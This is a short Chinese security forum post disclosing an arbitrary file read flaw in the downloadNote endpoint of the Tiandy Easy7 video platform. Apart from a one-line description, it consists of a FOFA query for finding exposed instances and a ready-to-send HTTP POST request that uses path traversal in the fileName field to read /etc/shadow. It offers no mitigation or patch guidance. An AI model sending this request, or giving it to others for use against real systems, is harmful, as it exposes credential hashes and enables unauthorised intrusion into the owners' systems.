天地伟业Easy7 downloadNote存在任意文件读取漏洞-网络安全论坛-网络安全-阻击者联盟

天地伟业Easy7 downloadNote存在任意文件读取漏洞

天地伟业Easy7平台的downloadNote接口存在任意文件读取漏洞,攻击者可通过构造特定请求读取系统敏感文件,导致信息泄露。

 

fofa:app=”Tiandy-Easy7″

d2b5ca33bd20251129075500

d2b5ca33bd20251129075507

POST /Easy7/rest/file/downloadNote HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: keep-alive
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br

fileName=/../../../../../../etc/shadow&fullName=1

 

请登录后发表评论

    没有回复内容